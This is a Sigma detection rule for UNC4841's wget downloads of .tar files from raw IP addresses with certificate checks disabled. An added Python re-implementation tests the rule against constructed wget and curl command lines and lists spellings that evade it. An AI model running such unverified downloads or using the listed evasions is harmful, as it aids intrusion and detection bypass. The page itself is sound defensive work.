UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
Detects execution of "wget" with "--no-check-certificate" to fetch a ".tar" file over HTTPS from a raw IPv4 address rather than a hostname, i.e. a download for which the server certificate could not have been validated against a trusted name in the first place. As seen used by UNC4841 during their exploitation of the Barracuda ESG zero-day. The match is purely string-based: it requires the literal "https://", the full "--no-check-certificate" option name and a command line ending in ".tar", so "http://" URLs, ".tar.gz" archives and abbreviated option spellings are not covered, and the optional filter suppresses hits on private, loopback and link-local addresses.
Sigma rule
```yaml
title: UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
id: 23835beb-ec38-4e74-a5d4-b99af6684e91
status: test
description: Detects execution of "wget" to download a "tar" from an IP address that doesn't have a trusted certificate. As seen used by UNC4841 during their Barracuda ESG zero day exploitation.
references:
    - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023/06/16
tags:
    - attack.defense_evasion
    - attack.t1140
    - detection.emerging_threats
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/wget'
        CommandLine|re: 'https://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
        CommandLine|contains: '--no-check-certificate'
        CommandLine|endswith: '.tar'
    filter_main_local_ips:
        # Note: Remove or comment out this filter to also alert on downloads from private, loopback and link-local addresses
        CommandLine|contains:
            - 'https://10.' # 10.0.0.0/8
            - 'https://192.168.' # 192.168.0.0/16
            - 'https://172.16.' # 172.16.0.0/12 (172.16. through 172.31.)
            - 'https://172.17.'
            - 'https://172.18.'
            - 'https://172.19.'
            - 'https://172.20.'
            - 'https://172.21.'
            - 'https://172.22.'
            - 'https://172.23.'
            - 'https://172.24.'
            - 'https://172.25.'
            - 'https://172.26.'
            - 'https://172.27.'
            - 'https://172.28.'
            - 'https://172.29.'
            - 'https://172.30.'
            - 'https://172.31.'
            - 'https://127.' # 127.0.0.0/8
            - 'https://169.254.' # 169.254.0.0/16
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
```
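The following is an added example and not part of the SigmaHQ rule or this page: the rule's selection, local-IP filter and condition re-implemented in plain Python and run over a handful of constructed Linux process_creation events (sample command lines are made up for illustration, not taken from the Mandiant report). It shows which variants alert, which the filter suppresses, and which fall outside the string matches (plain http, .tar.gz, an abbreviated option name that GNU getopt_long still accepts). The filter is also expressed a second time as CIDR membership so the prefix list can be checked against the intended networks; that network-based variant is an addition for comparison, not something the rule does.

```python
"""Re-implementation of Sigma rule 23835beb-ec38-4e74-a5d4-b99af6684e91
(added example, not the rule's own code) over constructed events."""
import ipaddress
import re

# Same regex as the rule's CommandLine|re modifier. It only checks the shape
# "digits.digits.digits.digits", so it also accepts non-addresses like 999.1.1.1.
DIRECT_IP_RE = re.compile(r"https://([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})")

# The 20 string prefixes of filter_main_local_ips, generated instead of typed out.
# 172.16. through 172.31. together cover exactly 172.16.0.0/12.
LOCAL_PREFIXES = (
    ["https://10.", "https://192.168."]
    + [f"https://172.{n}." for n in range(16, 32)]
    + ["https://127.", "https://169.254."]
)

# The same intent expressed as networks (comparison only, not in the rule).
LOCAL_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]


def selection_matches(image: str, cmdline: str) -> bool:
    """All four fields of 'selection' are ANDed, exactly as in the rule."""
    return (
        image.endswith("/wget")
        and DIRECT_IP_RE.search(cmdline) is not None
        and "--no-check-certificate" in cmdline
        and cmdline.endswith(".tar")
    )


def filter_local_prefix(cmdline: str) -> bool:
    """filter_main_local_ips as written: substring match on URL prefixes."""
    return any(p in cmdline for p in LOCAL_PREFIXES)


def filter_local_network(cmdline: str) -> bool:
    """Same intent via CIDR membership. A dotted quad the regex accepts but
    ipaddress rejects (e.g. 999.1.1.1) is treated as not local, so it still alerts."""
    m = DIRECT_IP_RE.search(cmdline)
    if m is None:
        return False
    try:
        ip = ipaddress.ip_address(m.group(1))
    except ValueError:
        return False
    return any(ip in net for net in LOCAL_NETWORKS)


def rule_matches(image: str, cmdline: str, exclude_local: bool = True) -> bool:
    """condition: selection and not 1 of filter_main_*  (filter switchable)."""
    if not selection_matches(image, cmdline):
        return False
    if exclude_local and filter_local_prefix(cmdline):
        return False
    return True


# Constructed sample events (not from the Mandiant report).
SAMPLE_EVENTS = [
    # 0: the pattern the rule was written for -> alert
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-certificate https://203.0.113.10/pkg.tar"},
    # 1: same, but from an RFC 1918 address -> suppressed while the filter is active
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-certificate https://10.20.30.40/pkg.tar"},
    # 2: .tar.gz -> endswith '.tar' fails, no alert
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-certificate https://203.0.113.10/pkg.tar.gz"},
    # 3: plain http -> the regex requires https://, no alert
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-certificate http://203.0.113.10/pkg.tar"},
    # 4: GNU getopt_long accepts unambiguous abbreviations, so wget runs this,
    #    but the 'contains' test on the full option name fails -> no alert
    {"Image": "/usr/bin/wget",
     "CommandLine": "wget --no-check-cert https://203.0.113.10/pkg.tar"},
    # 5: same download via curl -> Image check fails, the rule is wget-only
    {"Image": "/usr/bin/curl",
     "CommandLine": "curl -k -o pkg.tar https://203.0.113.10/pkg.tar"},
]


def evaluate(events, exclude_local: bool = True):
    """Return the indices of events the rule would alert on."""
    return [i for i, e in enumerate(events)
            if rule_matches(e["Image"], e["CommandLine"], exclude_local)]


if __name__ == "__main__":
    print("with local filter:   ", evaluate(SAMPLE_EVENTS))
    print("without local filter:", evaluate(SAMPLE_EVENTS, exclude_local=False))
```

Running it alerts only on event 0 with the filter active and on events 0 and 1 without it; events 2 to 5 never match. Events 3 and 4 are the ones worth keeping in mind when tuning: a plain-http fetch or a shortened option spelling is the same tradecraft but falls outside the literal strings the rule tests.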
References
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Related rules
- UNC4841 - Download Compressed Files From Temp.sh Using Wget
- UNC4841 - SSL Certificate Exfiltration Via Openssl
- Potential BlackByte Ransomware Activity
- Linux Base64 Encoded Pipe to Shell
- UNC4841 - Barracuda ESG Exploitation Indicators